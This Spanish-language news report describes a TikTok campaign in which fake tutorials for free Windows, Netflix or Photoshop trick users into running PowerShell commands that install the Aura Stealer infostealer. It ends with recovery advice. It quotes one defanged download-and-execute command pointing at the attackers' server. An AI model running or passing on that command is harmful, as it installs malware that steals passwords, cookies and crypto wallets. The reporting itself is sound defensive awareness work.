Una nueva campaña maliciosa detectada en TikTok está utilizando supuestos tutoriales para conseguir programas gratis, como Windows, Netflix o Photoshop, con el fin de distribuir malware y robar información personal, alertó el experto en ciberseguridad Xavier Mertens, del SANS Internet Storm Center (ISC).
Así roban datos en TikTok
Los videos, con explicaciones breves y aparentemente confiables, guían a los usuarios a ejecutar comandos peligrosos en sus computadoras. En lugar de obtener acceso gratuito, las víctimas terminan entregando el control de sus dispositivos a los atacantes.
De acuerdo con el análisis del ISC y del portal Trend Micro, los atacantes usan una técnica conocida como ClickFix, basada en ingeniería social. Los videos invitan a ejecutar comandos en PowerShell, una herramienta interna de Windows, para supuestamente desbloquear licencias o funciones premium.
Un ejemplo citado es el comando: iex (irm slmgr[.]win/photoshop)
Este código no instala Photoshop, sino que conecta el dispositivo a un servidor remoto para descargar scripts maliciosos que comprometen la seguridad del sistema.
¿Qué roba el malware distribuido por TikTok?
Según el portal Bleeping Computer, los scripts descargados instalan dos archivos ejecutables. El primero corresponde al malware Aura Stealer, diseñado para extraer:
- Contraseñas almacenadas en navegadores
- Cookies de autenticación
- Billeteras de criptomonedas
El segundo archivo aún no ha sido completamente analizado, pero tiene la capacidad de ejecutar código a demanda, lo que sugiere que el ataque puede adaptarse al perfil del usuario infectado.
Muchos de estos tutoriales usan títulos atractivos como “Cómo activar Photoshop sin pagar” o “Truco para tener Netflix gratis”, lo que incrementa la posibilidad de que usuarios de todas las edades caigan en la trampa.
¿Qué hacer si caíste en un tutorial falso?
Los expertos recomiendan que si un usuario ejecutó los comandos sugeridos por estos videos, debe actuar de inmediato:
- Cambiar todas sus contraseñas, especialmente las de correo, redes sociales, bancos y plataformas de streaming.
- Escanear el equipo con un antivirus actualizado o herramientas de seguridad avanzadas.
- Desconectar el dispositivo de redes sensibles, como las corporativas o domésticas, en caso de detectar actividad sospechosa.
- Evitar volver a ejecutar comandos o descargas que no provengan de fuentes oficiales.
TE PODRÍA INTERESAR